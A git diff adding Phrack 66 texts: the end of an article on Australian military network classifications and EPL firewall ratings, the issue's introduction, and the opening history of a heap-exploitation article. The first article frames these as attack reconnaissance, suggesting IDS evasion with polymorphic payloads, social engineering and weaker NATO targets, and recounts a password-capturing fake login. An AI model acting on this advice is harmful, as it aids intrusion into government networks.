+*                *   National Security.   *                             *
+*************************************************************************
+* RESTRICTED     * - public domain.       *  an EAL2 Firewall.          *
+*                * - UNCLASSIFIED.        *                             *
+*                * - IN-CONFIDENCE.       *                             *
+*************************************************************************
+*                * - PROTECTED.           *  a traffic flow filter.     *
+*                * - HIGHLY PROTECTED.    *                             *
+*                *   National Security.   *                             *
+*************************************************************************
+* PROTECTED      * - public domain.       *  an EAL4 Firewall.          *
+*                * - UNCLASSIFIED.        *                             *
+*************************************************************************
+*                * - IN-CONFIDENCE.       *  an EAL3 Firewall.          *
+*                * - RESTRICTED.          *                             *
+*************************************************************************
+*                * - PROTECTED.           *  an EAL2 Firewall.          *
+*************************************************************************
+*                * - HIGHLY PROTECTED or  *  an EAL1 Firewall.          *
+*                *   National Security.   *                             *
+*************************************************************************
+
+Can you see the interesting parts with regard to our dialups?
+
+2 things I notice right away. If anything HIGHLY PROTECTED or National
+Security rated are connected to the network we have dialups for - there's
+only a packet filter in between me and it - if the old DRN network rating
+hasn't changed. (A restricted network).
+
+Also, behind that terminal server, I can probably expect to find myself
+facing a nice EAL2 rated firewall. As I would assume the PSTN Network is
+considered "Public Domain". It may even require some kind of secure-ID
+type authentication - a one time pad or smartcard.
+
+This would be a theoretical login session given the types of equipment
+listed on the EPL and what they are used for.
+
+The network topology could easily include remote identification servers.
+The  terminal server itself can instigate PPP with a client, pass you 
+through to the Cisco VPN 3000 Concentrator(EAL2), you authenticate there 
+via key and it directs you to where you're trying to go, when you get 
+there you have a Sun Firewall-1 (EAL4+) asking for your SecureID one time 
+PAD or similar product.  Once you do that, you can check your email, 
+download your porn, whatever.
+
+Also the other interesting thing to note - EAL1 rated firewalls are only
+going to be found on PROTECTED, HIGHLY PROTECTED or National Security
+networks and only where they interconnect with others of the same security
+rating. If you find one one of those firewalls - you know the importance
+of the networks you're on.
+
+Now down to the exact security designations for the products:
+
+EAL1 - Functionally Tested. Provides analysis of the security functions,
+using a functional and interface specification of the TOE (target of
+evaluation), to understand the security behaviour. The analysis is
+supported by independent testing of the security functions.
+
+EAL2 - Structurally Tested. Anaysis of the security functions using a
+functional and interface specification and the high level design of the
+subsystems of the TOE. Independent testing of the security functions,
+evidence of developer "black box" testing, and evidence of a development
+search for obvious vulnerabilities.
+
+EAL3 - Methodically Tested and Checked. The analysis is supported
+by "grey box" testing, selective independent confirmation of the
+developer test results, and evidence of a developer search for obvious
+vulnerabilities. Development environment controls and TOE configuration
+management are also required.
+
+EAL4 - Methodically Designed, Tested and Reviewed. Analysis is supported
+by the low-level design of the modules of the TOE, and a subset of the
+implementation. Testing is supported by an independent search for obvious
+vulnerabilities. Development controls are supported by a life-cycle model,
+identification of tools, and automated configuration management.
+
+EAL5 - Semiformally Designed and Tested. Analysis includes all of
+the implementation. Assurance is supplemented by a formal model and a
+semiformal presentation of the functional specification and high level
+design, and a semiformal demonstration of correspondence. The search
+for vulnerabilities must ensure relative resistance to penetration
+attack. Covert channel analysis and modular design are also required.
+
+EAL6 - Semiformally Verified Design and Tested. Analysis is supported by
+a modular and layered approach to design, and a structured presentation
+of the implementation. The independent search for vulnerabilities must
+ensure high resistance to penetration attack. The search for covert
+channels must be systematic.  Development environment and configuration
+management controls are further strengthened.
+
+EAL7 - Formally Verified Design and Tested. The formal model is
+supplemented by a formal presentation of the functional specification
+and high level design showing correspondence. Evidence of developer
+"white box" testing and complete independent confirmation of developer
+test results are required. Complexity of the design must be minimised.
+
+Note: Only assurance levels 1-4 are incorporated in the CCRA currently,
+and ratings of products which fit criteria above level 4 in Australia,
+are designated 4+ on the EPL.
+
+Here I'll give a few examples of ratings from random catagories.
+(The EPL is split up into various network devices and then the larger
+part of network security products).
+
+Biometric Products
+EAL2  - Iridian Technologies KnoWho Authentication Server and Private ID
+
+Miscellaneous Devices
+E1    - NEC S2 (Mobile Satellite Terminal)
+EAL1  - Cisco VoIP Telephony Solution
+
+Network Security Devices
+EAL1  - Secure Session VPN v4.1.1
+EAL2  - SurfControl Email filter for SMTP
+EAL4  - Clearswift Bastion II Firewall
+EAL4+ - Cisco Secure PIX Firewall V7.0(6)
+
+Operating Systems
+E3    - AIX V4.3
+EAL4+ - Sun Trusted Solaris 8/04
+EAL4+ - Windows 2000 Professional, Server and Advanced Server 
+        with SP3 and Q326886 Hotfix *cough*bullshit*cough*
+
+
+There are also smartcard products, PC Security products, encryption 
+products, and many other catagories. More in-depth information can be 
+found on the website itself regarding each product.
+
+
+--[ 6. The EPL and CCRA in depth
+
+During 1998 The United Kingdom, France, Germany, The United States and
+Canada put in place the CCRA. Australia joined in 1999. It should be noted
+here also that under the member countries list (with contact details)
+under the DSD website, Japan, South Korea, Netherlands and Norway have
+also joined the CCRA recently.
+
+This Criteria is for use between the countries in any kinds of shared
+network arrangements - this process is called "Mutual Recognition". The
+philosophy behind this is that overseas products rated by the DSD, NSA
+and various other organisations can be used in other member countries
+without being re-evaluated as the criteria is the same. Although it may
+be noted that (at least in Australia) the DSD does provide exceptions for
+any kind of cryptographic equipment which it may need to give particular
+evaluation to.
+
+(I wonder if this is a security concern or more to do with compatibility).
+
+Also available is the ACSI33 Network Security Manual - Public Domain
+Copy [1] - this is much like the old DoD Orange Book in the US.
+This manual defines many of the Australian DoD Network security standards
+and criteria prerequisites for many of the supplicants of DSD/DoD approval
+for the Evaluated Products List (EPL).
+
+If you check the EPL itself, you'll find criteria certification reports
+and security target papers, defining how the product was certified,
+possible weaknesses in the product, how the product should be used in
+the DoD and all the contact details any given DoD department should need
+to buy such a product or get information on it.
+
+You have the shopping list for exploits, contact information for social
+engineering, a detailed outline of what to worry about once you'd attacked
+a DoD network point and how to hide yourself from IDS - you have the list
+of what IDS are used, and can download the IDS signature recognition
+files and run those through something like IDA Pro disassembler. Then
+modify your code/payload to no longer alert the IDS software, use of
+polymorphic payload would be a good technique to use for this once you
+know the triggering pattern.
+
+Since the old days of hacking into .mil's on the old milnet (the cold-war
+ip network of the USA which was used both for research and development)
+of the early 90's lots of things happened. Lots of busts and a lot of
+talk of securing the governments of the western world. And they are not
+the only ones. Since the early 90's we've seen a huge amount of digest on
+changes to computer related laws worldwide in relation to this particular
+agenda in places like Russia, China and North Korea.
+
+There is more than enough information in these documents to set up
+an elaborate network attack, when the various military organisations
+will be more reliant than ever on these networks for command and
+control, logistics and communications.
+
+More interesting is the fact that on the UK EPL and the US EPL they also
+list the same products with the same rating - even though some of them have
+been independantly assessed (haha), further pushing the point that these
+networks are now at least slightly interoperable or at least becoming so
+over time.
+
+The scarey part is that it's connected to the largest military
+body in the world. The US DoD, who have run SIPRN for many years, since 
+they re-built the early milnet after the cold-war. The network there being
+able to at least speak to the Australian network and be restricted by
+guidelines of Mutual Recognition as set down by the new standards in the
+CCRA must of course adhere to the same standards, and can be recognised
+by the EAL designation on the Australian and UK EPLs.
+
+Theory: Latest exploits - or even old ones - could still work
+to this day on many of the systems because of the way the EPL is
+implemented. Companies must pay to become a part of the EPL. It can cost
+upward of $1,000,000 AUD to get a product certified sufficiently. From
+the companies point of view - the more they pay, the better their market
+share is, because the further up the EPL rating they go - by taking
+more time through evaluation - which costs more to get evaluated for,
+they find less companies are willing to pay for the evaluation.
+
+This directly impacts sales because the more secure a network is rated
+internally by the DSD the less choice any given department has for the
+products to secure it.  Pretty much the DSD/NSA etc. will give you a
+license to print money - as long as you pay THEM first. 
+
+Here's one recent example of the whole deal going wrong which has come out
+in the press as I wrote this article [7]. I find it interesting that even 
+the most educated security consultants aren't really that aware of the way
+the intelligence community is functioning when it comes to the CCRA/EPL
+equipment. Their mention of "Pentest expresses doubts about whether the
+certification of the firewall according to Common Criteria EAL4+ is 
+merited on the basis of the flaws it unearthed." amuses me. Fact is, once
+a particular IMPLEMENTATION of a product is evaluated, it doesn't change.
+It won't be "Regularly Patched" or even "Regularly Evaluated", any changes
+whatsoever made to the  implementation make it non-standard and no longer 
+adhering to the criteria it was evaluated for originally - that's the point
+of evaluation - as far as the DSD/NSA are concerned.
+
+You are almost back at the old NASA addage back when the space race was
+on and they would joke that the Russians had their best minds and parts
+going into their project while the US spacecraft was 10,000 moving parts,
+all built by the lowest bidder run by a group of people chosen on their
+ability to kiss ass.
+
+This is the basic problem with beaurecracy in the western military. 
+Beaurecrats are always trying to justify their existence, they do so 
+by telling everyone what they are doing and companies involved want to say 
+"hey look what we did for the DoD".
+
+On with our look at the pretty secure network: Without actually breaking
+in, we can't know if you can break into the american network from the
+Australian side, or any other side, however, the previous designations
+with regard to PROTECTED networks connecting to National Security Networks
+could tell us that we might be able to easily. I suggest that no matter
+what the CCRA will tell countries to do, their own internal DSD, NSA, DoD
+computer departments will require some heavy security between coalition 
+members. But this is only an assumption on my part, I wouldn't put it
+past the various department heads to cut costs here - it happens.
+
+I find it amusing that in none of the above departments or EPL's does
+NSA SELinux get a mention ;) (Probably just someone's pet project).
+
+One assumption you'd have to make is the network wouldn't be fast out of
+the country you're in. Ground based satellite transponders are bound to
+be slow, ship based ones even slower. Network coverage of combat areas
+is going to be pretty nasty for data - especially if you are on a dialup 
+line. But they are there. Recent Satellite scans show a large number of S 
+and X band non-commercial satellite beacons (which show working 
+transponders in space) and data/analog signals which are encrypted as no 
+in-band scans return any valid output at all (you can see the bandwidth is 
+being used however).
+
+I dont have a lot of information about the SIPR Network, not being in the
+U.S (hopefully it will not be long before someone writes another article
+on it).
+
+But from the DISA website:
+
+SIPRNet: The Secret IP Router Network (SIPRNet) is DoDs largest
+interoperable command and control data network, supporting the Global
+Command and Control System (GCCS), the Defense Message System (DMS),
+collaborative planning and numerous other classified warfighter
+applications. (Note: I suggest warfighter applications means training
+programs).
+
+Direct connection data rates range from 56 kbps to 155Mbps. Remote
+dial-up services are available up to 19.2kbps.
+
+The data rates there are interesting, meaning they also have dialup and
+ATM links available possibly faster is now available as that page hasn't
+been updated since the mid 90's.
+
+
+--[ 7. Other Standards
+
+The only other standards I've found that are worthy of note for this 
+particular paper are the encryption standards. These are also noted in the 
+acsi33 document fully. The usage of 3DES and AES for symmetrical 
+encryption and RSA/DH/DSA/Elliptic Curve Diffie-Hellman (ECDH)/Elliptic 
+Curve Digital Signature Algorithm (ECDSA) for asymmetric (key exchanges). 
+Encryption is not my strong point, however it should  be noted the CCRA 
+members defer to NIST with regard to most of their encryption 
+standards.
+
+Fact is I am quoting almost directly from the acsi33 document here, the 
+only encrypted VPNs I ever set up for these companies I worked for were
+Cisco IOS 3des algorithms.
+
+
+--[ 8. Secrets
+
+At the end of the cold war, there were probably a few hundred thousand 
+computers hooked up to the internet. Almost every country on earth had 
+SOMETHING hooked up. The R&D departments of universities in Australia was 
+where I got my internet access from and developed contacts in the hacker
+scene of the time. At that time China and the USSR were both large threats
+to western dominance, however I find it interesting to note that all of the
+member countries of both of these power blocks were internet connected at 
+the time the cold war was in full force.
+
+The US DoD or DARPA has still never actually disclosed any given project to
+do with engineering or humanities that the internet actually facilitates 
+apart from communication.
+
+One has to wonder about the significance of the storm worm and other such 
+virii, their ability to act as an autonomous strike against non-military,
+but more a regional strike against economic infrastructure. 
+
+The foreseen assumption of any given biological, nuclear or widespread 
+terrorist attack would be that that economic infrastructure would disolve
+before military infrastructure.
+
+After having written this article, I'm not entirely sure that is a valid 
+assumption...
+
+
+
+--[ 9. Conclusion
+
+Much as I would like to write more about the networks in other nations
+(Japan and France would be nice to find out about), I don't really have
+the time to wardial or do research for so many networks in so many 
+countries. It will have to come at a later date by other writers. But keep 
+in mind, the USA spend the most on industrial military and mainstream 
+military projects in the world just by matter of overall odds for breaking
+in and not being discovered, they are probably your least favourable 
+target. As the network seems to now be interconnected with other NATO 
+nations, one of the nations spending less on it might be give
+better outcomes.
+
+The standards are the same across the board anyhow, most of this 
+information will still be good as long as you are in, or looking at a 
+network in one of these member nations.
+
+I think many people in the various military departments across the world
+who are member organisations for this particular network should be quite
+embarassed by this information being so easy to get. Security through
+obscurity is another oldschool technique which seems to have gone the
+way of the steam train - even by those who should be most concerned with
+obscuring and securing their data.
+
+Any hacker who has been around for any decent length of time can tell you
+there is a way around any system - if you added the extra advantage of
+having many men who are ready and willing to come to your country and
+"kick the door down" to procure some of this information, the people
+responsible for this should be concerned. If we can glean all of this
+from the "public domain" security level, imagine just having some access
+to documentation from the IN-CONFIDENCE network computer.
+
+In my own experience in working for the Australian DSD through
+contractors, I found many times that their network data security was
+very dependant upon one or two applications that were bought from
+outside organisations - poorly implemented and only very rudimentary
+security precautions taken. Even the fact that I worked there - even with a
+previous criminal record to do with gaining access to commonwealth 
+systems,  inserting data in commonwealth systems, and defrauding the 
+credit card system - was a security breach. 
+
+One of the first computers I ever broke into was done via a COBOL packet 
+snarfer. I re-wrote all of the screens to all of the computers the terminal
+servers would connect to. Then from an account I looked over someone's 
+shoulder to get, I ran up the snarfer and it would look as if I had logged 
+out. I hadn't, in fact the program was running and looked like the login 
+screen. When you typed in your username/password pair, it gave the 
+usual "Password Authorisation Failure" or other error message (depending 
+on where you were logging in) and it logged it to a file in another 
+account - which had the file permissions opened on it so other accounts 
+could write to its' directory. The program then logged itself out - 
+giving the user the normal login screen. Completely unseen by them, and 
+they merely thought they had typed the wrong password.
+
+8 Years later I was working for this particular contractor to the DSD, I 
+found myself sitting  in Air Force bases, Navy Logistics Centres, as well 
+as many high-end government and corporate computer security departments. 
+Physical security was not an issue - even though, if propper background 
+checks had been done on me - I would not have been allowed 
+to be there.
+
+Iin the past few months I've seen various talk in the press about botnets,
+attack vectors from unknown sources and the dreaded "black hat" hackers. 
+The latest laugh I had was the stats from google saying that more unix 
+boxes had been compromised than windows boxes and the reporter couldn't 
+understand why unix was considered more secure than windows. They didn't 
+and don't to this day understand WHY *nix and open source are more secure 
+- I am not going to educate people here.
+
+Creating an aire of "hype" or complacency in any security environment is 
+completely unconstructive, use of "known factors" through use of friends 
+and other associates is likewise unconstructive.
+
+The reasons for this are simple and are defined indeed by one of the latest
+press releases from the whitehouse.
+
+
+
+
+
+
+"On the last day, we won't be lost because of a lack of strength or a lack 
+of equipment. We'll be lost because of a lack of trust."
+
+
+--[ 10. Annex
+
+Acronyms: 
+---------
+
+[i]    RAN - Royal Australian Navy 
+[ii]   FISSO - Fleet Information System Support Organisation.  
+[iii]  DSD - Defence Signals Directorate.  
+[iv]   DoD - Department of Defence.  
+[v]    DRN - Defence Restricted Network.  
+[vi]   NSA - National Security Agency (USA).  
+[vii]  SIPRN - Secret IP Router Network (US DoD).
+
+Resources: 
+-----------
+
+[1] http://www.dsd.gov.au/library/infosec/acsi33.html 
+[2] http://www.cesg.gov.uk/site/iacs/index.cfm? 
+    menuSelected=1&displayPage=151
+[3] http://www.defence.gov.au/dmo/id/cic_contracts/Values2001-2002.pdf
+[4] http://www.yaffa.com.au/defence/pdf/05/top40-20-2004.pdf
+[5] http://www.disa.mil/main/prodsol/data.html 
+[6] http://www.kaz-group.com/files/casestudies/cs_ran.pdf
+[7] http://www.theregister.co.uk/2007/10/03/check_point_pentest/
+[8] http://www.softwink.com/iwar/
+[9] http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?
+    searchvalue=thefinn&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0
+
diff --git a/phrack66/1.txt b/phrack66/1.txt
new file mode 100644
index 0000000..ab20ebf
--- /dev/null
+++ b/phrack66/1.txt
@@ -0,0 +1,259 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x01 of 0x11
+
+|=----------------------------------------------------------------------=|
+|=-------------------------=[ Introduction ]=---------------------------=|
+|=----------------------------------------------------------------------=|
+|=------------------=[ By The Circle of Lost Hackers ]=-----------------=|
+|=----------------------------------------------------------------------=|
+
+
+Let's imagine a man, sitting on the Moon and looking down to this
+75%-water-25%-ground Planet. He doesn't know anything about us. Neither we
+do about him, but that's another story, maybe another Intro.
+
+He sees this Internet madness going on down there. He sits and watches.
+
+"This is not different from your favourite bar", a guy behind our man says
+in a smile.
+
+Down there a bunch of bar tenders provides connections to everybody. They
+earn their life out of that, so every so often they just scrappy down
+their service. There's water in my drink, sir, and there's a strange rate
+of packet loss on my P2P traffic.  There are a bunch of gangsters: they
+want to control the business, they want to know who does what and they try
+to shut down whoever is not okay with that. We have cleaned their faces,
+put them on TV and we keep on calling them politicians. Good luck with
+your laws, we'll find our way out, somehow. There are beautiful girls,
+there are married couples, there are young guys, there are usual and
+occasional customers. Everybody is down there, everybody has his own
+chance to tell his story.  If you're getting to this bar for the first
+time, you might spot some guys that are just different. You can't say why,
+but there's something.  It doesn't matter if they are married, young, old,
+musicians, workers, even bartenders, this is just the outside. There's
+another life, behind that, it's now so-damn-clear that they're just trying
+to keep a balance with it.
+
+"You used to be one of them, didn't you ?"
+
+Our man-on-the-moon asks, looking at the guy. But there's no need of an 
+answer, he is just different. You can't say why, but there's something. 
+Somebody once told me that Heaven is on the Moon.
+
+"What's your name again ?"
+"Cliph."
+
+[ I don't know in what you believe or even if you believe. In the end, it 
+doesn't really matter. This is not a story about science or religion or 
+humanity, this is a Good-Bye. To a friend.. ]
+
+
+-----[ Phrack Issue #66
+
+
+Welcome to Phrack, by the community, for the community. 
+
+Its with an incredible pleasure that we present you our newly released
+issue : 
+
+		       Phrack Magazine #66
+
+For this release, we are gracious to be interviewing the PaX
+Team, whose work has made significant evolutionary and revolutionary
+advances in security. This is a radical change from the Phrack Prophile
+in issue #65 where the prophile was about the UNIX terrorist.
+
+Some could easily detect in this shift a certain seek for identity from
+the Phrack staff. As if the identity of Phrack had to be refined at all.
+
+In the previous prophile, we had interviewed probably the most hated
+"black hat" hacker, and in the current prophile, the most hated "white
+hat" hacker.  Perceived as such. But the reality is more faded and every
+hacker has this paradoxical identity where each side of the barrier
+suddenly become very familiar to the other. And this is where the great
+hacker shall remain.
+
+Phrack keeps its identity. A magazine for all hackers, by all hackers.
+
+The Hacker culture.
+
+To the very firsts who don't believe in the virtue of the Underground, I
+answer:
+
+Kill the underground, you won't kill the Hacker culture.
+
+We are mourning one of the best hackers of recent time today. His spirit
+and contributions will remain part of the Hacker culture. We dedicate this
+issue of Phrack to Cliph, who left us really too early this year. Cliph
+did influence all kernel exploit writers in the last 5+ years with his
+advances on exploiting the Linux kernel.
+
+
+----------[ Phrack Issue #66 : what you were waiting for
+
+
+We have the great pleasure to release today another excellent selection of
+the best Hacking articles this year. An issue full of new exploitation
+techniques and ground work on writing attack software.
+
+
+[-]=====================================================================[-]
+
+
+ 0x01 Introduction                                             TCLH
+ 0x02 Phrack Prophile on The PaX Team                          TCLH
+ 0x03 Phrack World News                                        TCLH
+ 0x04 Abusing the Objective C runtime                          Nemo
+ 0x05 Backdooring Juniper Firewalls		               Graeme
+ 0x06 Exploiting DLmalloc frees in 2009         	       Huku
+ 0x07 Persistent BIOS infection		                       .aLS & 
+                                                               Alfredo
+ 0x08 Exploiting UMA : FreeBSD kernel heap exploits            Argp & Karl
+ 0x09 Exploiting TCP Persist Timer Infiniteness                Ithilgore
+ 0x0A Malloc Des-Maleficarum			               Blackngel
+ 0x0B A Real SMM Rootkit				       Core collapse
+ 0x0C Alphanumeric RISC ARM Shellcode                          Y.Younan & 
+                                                               P.Philippaerts
+ 0x0D Power cell buffer overflow			       BSDaemon
+ 0x0E Binary Mangling with Radare			       Pancake
+ 0x0F Linux Kernel Heap Tempering Detection		       Larry H.
+ 0x10 Developing MacOSX Rootkits			       Wowie & 
+                                                               Ghalen
+ 0x11 How close are they of hacking your brain ?	       Dahut
+
+[-]=====================================================================[-]
+
+This issue has some evil number.. with a lot of evil content. Phrack
+proves once more how we can, every year, push the state of the art further
+its known limits. Some of these exploits articles are really innovative
+and we are proud to be able to release those contributions in our columns.
+Some others bring their values on different architectures. So, check out
+how to attack the Objective C runtime, the latest Linux heap allocator,
+the FreeBSD kernel heap management system. A special paper is the one of
+Black about explaining and giving more insights and code on the
+groundbreaking work previously released as the Malloc Maleficarum
+technique(s). Black did rework his article quite a lot since the first
+version he did, and we were impressed by the evolution.  This will
+certainly help the younger audience to persevere in the realm of heap
+overflow exploitation in the most recent restrictive heap management
+implementations on Linux. We also have articles on alphanumeric ARM
+shellcode (long standing work) and exploiting the PowerCell architecture.
+Thats indeed a lot of exploitation.
+
+Beside exploit writing, we propose to you a couple of rootkits papers.
+Graeme shared his experience on backdooring Jupiner firewalls : check out
+the article for all details. Our friends from Argentina finished their
+stub just before the release and we could integrate their very first
+article about persistent BIOS infection. Other advances at the lowest
+level are also presented by the article of Core collapse, where he
+demonstrates how to make use of the System Management Mode interrupts in a
+real SMM rootkit. For more intermediate hackers of the OsX world, a nice
+state of the art article on OsX backdoors are given is the end of the
+issue, as an easy read. Its always good to have this kind of code ready to
+be used when you need it.
+
+Finally, as it always happen in Phrack, we have those articles that don't
+match with the others. This is the case of our single reverse engineering
+article in this issue, presenting the RADARE framework. RADARE is really
+an interesting tool, and some of its features are better explained with a
+tutorial like this one. Check out the RADARE website for a more complete
+documentation and to grab the latest code. Pancake and the RADARE team are
+always committing new stuffs in there and the list of supported features
+is impressive, and the scripting language really flexible and expressive
+for low level operations on binary files.
+
+Another special article is the one of Ithilgore about exploiting weakness
+in the TCP protocol. This is a great article, an innovative work we would
+like to see more often proposed for publication in Phrack. We still don't
+realize entirely how far Phrack is breaking through by providing all those
+technical details about the most alternative techniques.
+
+We were previously talking of PaX and evolutionary changes, we have an
+article discussing kernel heap security, and how it can be made more
+resistant to attack.  It has been rare to find mitigation articles in
+Phrack, but its not the first time this has happen, nor will it be the
+last. Sometimes, mitigation articles also contains some useful information
+for the exploit writer.  Sometimes, offensive articles also contains some
+useful information for defense purposes.
+
+Finish up your mind by reading the paper on Hacking your Brain, a 
+refreshing cyberpunk inspired work by Dahut.
+
+In the hope that your neural plugs were not wired in vain.
+
+  - The Phrack staff
+
+
+--------[ Greets for issue #66
+
+We'd like to thank (in no particular order):
+
+  - PaX team		- karl			- pancake
+  - Graeme		- Ithilgore		- Larry H.
+  - nemo		- blackngel		- Wowie
+  - Huku		- core collapse		- Ghalen
+  - .aLS		- Y.Younan		- Dahut
+  - Alfredo		- P.Philippaerts
+  - argp		- BSDaemon
+
+for their contributions. Without them, this issue would not be as good as 
+it is.
+
+If you see something that you would like covered, but is not / has not
+been recently, do some research and send us an article. Have you came
+up with a better mouse trap? Share it with the world. Phrack lives via
+the contributions made by the community.
+
+Hasta luego, Phrack para siempre.
+
+[-]=====================================================================[-]
+
+Nothing may be reproduced in whole or in part without the prior written
+permission from the editors. Phrack Magazine is made available to the
+public, as often as possible, free of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|
+
+Editors           : circle[at]phrack{dot}org
+Submissions       : circle[at]phrack{dot}org
+Commentary        : loopback[@]phrack{dot}org
+Phrack World News : pwn[at]phrack{dot}org
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+(Hint: Always use the PGP key from the latest issue)
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v2.0.10 (GNU/Linux)
+
+mQGiBEovYLgRBAD0+0JIMKclm1uY6gJMCxwSt4yOudXAktNKGfbpCFIUn/P/gacR
+teZUAp3T/0t2bpWLw5tKSfSKFk9i6LainHZqCXpB8NHhBXws6dH4uk06tf9LAFbQ
+scabxp2+qgKHEP6r15pzSKVqXCTy/fXzTweYUkwz3If2QkikHXrMnAKdHwCgpMlL
+FuK2e+z3tJdWPh7ORdt1/EUD/AnIshYeOvcUQ3VxOqD66M/E7hDoptYTrjYsUG67
+3XF7jwXvghEnPg4dWv4B2obkMS7kRdDnsHdngqk683IhC6nHRDc59odwit+eor/J
+Q86rqw5YhFwqbknL5bYgnNH6GxL6maqaXZ9bAJZdbNoZqdkFOVc6Qr2NqTzgNyLS
+DeXcA/9fksLr7slsMk0ZXaRhJY3RlmKYbuQZDFBoO6yhLfX1YJxtT8vvJ75gYFiz
+jNYfvmUvYr4TwMt5DLSIN1EQ3nC7qv+zEuV0BYPiHBIkldmxgOyQ67ysWlTTCTAa
+RNQnxludOcp+maC+zOK4RYbWw5x+TlbxKiaOuMjhEm4DYs+MNLRHVENMSCAtIFRo
+ZSBQaHJhY2sgU3RhZmYgKFBocmFjayBzdGFmZiAyMDA5IEdQRyBLZXkpIDxjaXJj
+bGVAcGhyYWNrLm9yZz6IYAQTEQIAIAUCSi9guAIbAwYLCQgHAwIEFQIIAwQWAgMB
+Ah4BAheAAAoJEJp0US5OshGiO/gAn0We2iWa2uzBnnA1IMDII/6YSK8DAJ9o+ozl
+OmM7bkkRnx6Ga1iEUL2aqbkCDQRKL2C4EAgA6kEGtB0jw/HkU0jmDJug4IkUWMN/
+8LdZNCUK5SvPNw+lTiv647OiSyhuCVnIED5ubJLovG49tYLIDmawiPDP1kQCCxBn
+0yfpJHeDtPHO0w5St5F54PYCAClwyp8PHRUXEpN2oHMa8CvvzlG8OUR9ycdlMrM1
+VzkJWNeoQ0axjTpg6Bmw+uLCwpOEZTGD8QiBrXqRo80qdy2s7tUybzFbhse9TFkE
+0kJ7QQ6o1LcMm8Xhfs+kNZemFt5srY+kjbQxyCOk38atncvs4aEUCUhgDIeoJjSp
+Xxbi5fNx2JT18It3TDYjxDnYGDAfMes+IRFW4Db92jQ9X/koKSwoJLoNdwADBQf/
+RqYZda5tUyOYS7ZyEKnYYG7EF919NOAz1UMHpkVtdOA6e2Dc3pBFTWJ9jUgNVpMr
+lMG5dAKjga61udVBTMyObnpYhXv0BpLM/GJ2QRZ8Ys16Lbyg+Kb7uQ09M1lTSf8r
+3CEd2Ue+Ll67SIb86CrcOZD84VQDWvsfaRaL51P6jAsQEjMamGcU7dwm0AvuiA4I
+49IxHYqUlnEd+jDPIws63LvHRj5gm78bmYwru6lxSNEFK91ImEd/FZrNMQL3wX63
+C5vviEWjJDPAEyp9wnKQcrmNvlF6B0VT8UPM/WT78EDZXNqUplMd6h0ymYCZV7xG
+OLJuVHoWLExmN8WpQMaSyYhJBBgRAgAJBQJKL2C4AhsMAAoJEJp0US5OshGi+QoA
+n0/wQqewpYDny3kFv7QwiB74xTR5AKCbBdNdO5mCbS6Mrzb/LZaqFVUkWg==
+=yFr3
+-----END PGP PUBLIC KEY BLOCK-----
+
+--------[ EOF
diff --git a/phrack66/10.txt b/phrack66/10.txt
new file mode 100644
index 0000000..9353304
--- /dev/null
+++ b/phrack66/10.txt
@@ -0,0 +1,2747 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x0A of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=----------------------=[ MALLOC DES-MALEFICARUM ]=---------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[    By blackngel                      ]=--------------=|
+|=---------------=[                                      ]=--------------=|
+|=---------------=[    <black *noSPAM* set-ezine.org>    ]=--------------=|
+|=---------------=[    <blackngel1 *noSPAM* gmail.org>   ]=--------------=|
+|=-----------------------------------------------------------------------=|
+
+
+          ^^
+      *`* @@ *`*     HACK THE WORLD
+     *   *--*   *    
+          ##         <blackngel1@gmail.com>
+          ||         <black@set-ezine.org>
+         *  *
+        *    *       (C) Copyleft 2009 everybody
+       _*    *_
+
+
+---[ INDEX
+
+
+ 1 - The History
+
+ 2 - Introduction
+
+ 3 - Welcome to The Past
+
+ 4 - DES-Maleficarum...
+
+   4.1 - The House of Mind
+       4.1.1 - FastBin Method
+       4.1.2 - av->top Nightmare
+
+   4.2 - The House of Prime
+       4.2.1 - unsorted_chunks()
+
+   4.3 - The House of Spirit
+
+   4.4 - The House of Force
+       4.4.1 - Mistakes
+
+   4.5 - The House of Lore
+
+   4.6 - The House of Underground
+
+ 5 - ASLR and Nonexec Heap (The Future)
+
+ 6 - The House of Phrack
+
+ 7 - References
+
+
+---[ END INDEX
+
+
+          "Traduitori son tratori"
+
+
+           -----------------
+---[ 1 ---[   THE HISTORY   ]---
+           -----------------
+
+On August 11, 2001, two papers were released in that same magazine and
+they went to demonstrate a new advance in the vulnerabilities exploitation
+world.  MaXX wrote in his "Vudo malloc tricks" paper [1], the basic
+implementation and algorithms of GNU C Library, Doug Lea's malloc(), and
+he presented to the public various methods that be able to trigger
+arbitrary code execution through heap overflows. At the same time, he
+showed a real-life exploit of the "Sudo" application.
+
+In the same number of Phrack, an anonymous person released other article,
+titled "Once upon a free()" [2]. Its main goal was explain the System V
+malloc implementation.
+
+On August 13, 2003, "jp <jp@corest.com>" developed of a way more advanced
+the skills initiated in the previous texts. His article, called "Advanced
+Doug Lea's malloc exploits" [3], maybe out the biggest support to what it
+was for coming...
+
+The skills published in the first one of the articles, showed:
+
+- unlink () method.
+- frontlink () method.
+
+... these methods were applicable until the year 2004, when the GLIBC
+library was patched so those methods did not work. 
+
+But not everything was said with regard to this topic. On October 11 of 
+2005, Phantasmal Phantasmagoria was publishing on the "bugtraq" mailing
+list an article which name provokes a deep mystery: "Malloc Maleficarum"
+[4].
+
+The name of the article was a variation of an ancient text 
+ called "Malleus Maleficarum" (The Hammer of the Witches)...
+
+Phantasmal also was the author of the fantastic article "Exploiting the 
+Wilderness" [5], the chunk most afraid (at first) by the heap's lovers.
+
+Malloc Maleficarum was a completely theoretical presentation of what could
+become the new skills of exploitation with regard to topic of the heap
+overflows. His author split each one of the skills titling them of the
+following way:
+
+   The House of Prime
+   The House of Mind 
+   The House of Force 
+   The House of Lore 
+   The House of Spirit 
+   The House of Chaos (conclusion) 
+
+And certainly, it was the revolution that open again the minds when the
+doors had been closed.
+
+The only one fault of this article is that it was not showing any
+proof of concept that demonstrated that each and every one of the
+skills were possible.
+
+Probably, the implementations stayed in the "background", or maybe in
+closed circles.
+
+On January 1, 2007, in the electronic magazine ".aware EZine Alpha",
+K-sPecial published an article simply called "The House of Mind" [6].
